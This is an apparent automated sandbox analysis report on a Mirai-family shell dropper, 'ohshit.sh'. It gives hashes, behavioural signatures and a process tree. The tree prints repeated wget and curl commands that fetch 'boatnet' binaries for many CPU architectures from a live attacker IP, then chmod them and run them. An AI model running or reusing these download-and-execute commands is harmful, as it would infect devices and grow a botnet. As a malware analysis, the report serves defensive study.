Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
31-12-2024 11:42
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
6aff3f3662291b471ab7ad4cbdd57c29
-
SHA1
04c570fcebd808ce12793fc191ee5cd886bbcc73
-
SHA256
51a77320da977deac7fb703c6333820bae779ad712f3216fe4d407500d889a8d
-
SHA512
d08ebda17bc94d8c89fcbb16f42c4be409ec96222e0c49b5a69b044b2e725a63caf03d803a225b76c764d86bba42a5b303bff539a90092e432aa861a7d6f4cc4
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1624 chmod 1488 chmod 1504 chmod 1520 chmod 1550 chmod 1616 chmod 1528 chmod 1564 chmod 1574 chmod 1608 chmod 1632 chmod 1592 chmod 1512 chmod 1536 chmod 1640 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1489 WTF /tmp/WTF 1505 WTF /tmp/WTF 1513 WTF /tmp/WTF 1521 WTF /tmp/WTF 1529 WTF /tmp/WTF 1537 WTF /tmp/WTF 1551 WTF /tmp/WTF 1565 WTF /tmp/WTF 1575 WTF /tmp/WTF 1593 WTF /tmp/WTF 1609 WTF /tmp/WTF 1617 WTF /tmp/WTF 1625 WTF /tmp/WTF 1633 WTF /tmp/WTF 1641 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1338/cmdline WTF File opened for reading /proc/1000/cmdline WTF File opened for reading /proc/1293/cmdline WTF File opened for reading /proc/419/cmdline WTF File opened for reading /proc/1490/cmdline WTF File opened for reading /proc/588/cmdline WTF File opened for reading /proc/1101/cmdline WTF File opened for reading /proc/1126/cmdline WTF File opened for reading /proc/424/cmdline WTF File opened for reading /proc/1492/cmdline WTF File opened for reading /proc/1239/cmdline WTF File opened for reading /proc/1475/cmdline WTF File opened for reading /proc/1179/cmdline WTF File opened for reading /proc/1601/cmdline WTF File opened for reading /proc/1578/cmdline WTF File opened for reading /proc/1636/cmdline WTF File opened for reading /proc/1057/cmdline WTF File opened for reading /proc/421/cmdline WTF File opened for reading /proc/1073/cmdline WTF File opened for reading /proc/627/cmdline WTF File opened for reading /proc/514/cmdline WTF File opened for reading /proc/1000/cmdline WTF File opened for reading /proc/1514/cmdline WTF File opened for reading /proc/1361/cmdline WTF File opened for reading /proc/1274/cmdline WTF File opened for reading /proc/1086/cmdline WTF File opened for reading /proc/1596/cmdline WTF File opened for reading /proc/709/cmdline WTF File opened for reading /proc/1086/cmdline WTF File opened for reading /proc/414/cmdline WTF File opened for reading /proc/1239/cmdline WTF File opened for reading /proc/1137/cmdline WTF File opened for reading /proc/559/cmdline WTF File opened for reading /proc/627/cmdline WTF File opened for reading /proc/1140/cmdline WTF File opened for reading /proc/1516/cmdline WTF File opened for reading /proc/536/cmdline WTF File opened for reading /proc/1114/cmdline WTF File opened for reading /proc/538/cmdline WTF File opened for reading /proc/1221/cmdline WTF File opened for reading /proc/1522/cmdline WTF File opened for reading /proc/668/cmdline WTF File opened for reading /proc/1054/cmdline WTF File opened for reading /proc/480/cmdline WTF File opened for reading /proc/1628/cmdline WTF File opened for reading /proc/701/cmdline WTF File opened for reading /proc/1122/cmdline WTF File opened for reading /proc/1568/cmdline WTF File opened for reading /proc/1122/cmdline WTF File opened for reading /proc/1578/cmdline WTF File opened for reading /proc/1035/cmdline WTF File opened for reading /proc/1506/cmdline WTF File opened for reading /proc/651/cmdline WTF File opened for reading /proc/1559/cmdline WTF File opened for reading /proc/536/cmdline WTF File opened for reading /proc/870/cmdline WTF File opened for reading /proc/1240/cmdline WTF File opened for reading /proc/514/cmdline WTF File opened for reading /proc/536/cmdline WTF File opened for reading /proc/1176/cmdline WTF File opened for reading /proc/1578/cmdline WTF File opened for reading /proc/1126/cmdline WTF File opened for reading /proc/1514/cmdline WTF File opened for reading /proc/664/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1493 wget 1499 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.m68k curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1481 -
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1482
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1486
-
-
/bin/catcat boatnet.x862⤵PID:1487
-
-
/bin/chmodchmod +x boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1488
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1489
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1493
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1499
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1505
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1509
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1513
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.i4682⤵PID:1517
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1521
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.i6862⤵PID:1525
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1529
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.x86_642⤵PID:1533
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1537
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1541
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-4d7go9 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1551
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1555
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-uyVJi6 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1565
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1569
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1575
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1579
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-EC9avh systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1593
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1597
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1609
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1613
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1617
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1621
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1625
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1629
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1633
-
-
/usr/bin/wgetwget http://85.237.211.124/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1637
-
-
/usr/bin/curlcurl -O http://85.237.211.124/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-cqHmau WTF2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1641
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD59e6da56f2e4b29e5d019938932a7d02d
SHA12039359cee130eb95673ba1d21a91965a87dc564
SHA256b528a15b83072c5d848eba0700eedf37dbfb35938a29e41c4529bee4e325203a
SHA5122084c8b7057d9fb9dc6587237c3e1a3172ae3cf51774097d587a2e2c6d0168b82d834b0c80d4f8672953df408e3b97dfc391f9aeb2ae263a2f12cbc12e34e382